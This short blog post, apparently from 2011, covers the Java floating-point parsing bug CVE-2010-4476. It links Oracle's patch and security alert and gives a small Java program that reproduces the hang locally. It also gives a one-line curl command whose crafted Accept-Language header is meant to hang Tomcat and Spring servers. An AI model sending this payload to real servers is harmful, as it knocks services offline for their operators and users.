Java DDOS 2.2250738585072012e-308 with curl

There seems to be an easy exploit for the problem going around in the news.

curl -H „Accept-Language: en-us;q=2.2250738585072012e-308“ URL

Apparently works on any Tomcat-server calling getLocale() on the request or most spring applications.

Meanwhile there is java patch for the problem, update your boxes!

Release Notes: http://blogs.oracle.com/henrik/2011/02/jdk_6_update_24_released.html
Security Alert: http://www.oracle.com/technetwork/topics/security/alert-cve-2010-4476-305811.html

For my servers it did not have an effect but maybe you had success? Please leave a comment.

Edit:

You should all have received a java security update by now. If not, you could simply use the following code to reproduce the bug locally.

$ cat Runhang.java 
class Runhang {
  public static void main(String[] args) {
    System.out.println("Test:");
    double d = Double.parseDouble("2.2250738585072012e-308");
    System.out.println("Value: " + d);
  }
}

$ javac Runhang.java
$ java Runhang &
... wait and kill it :)
Advertisements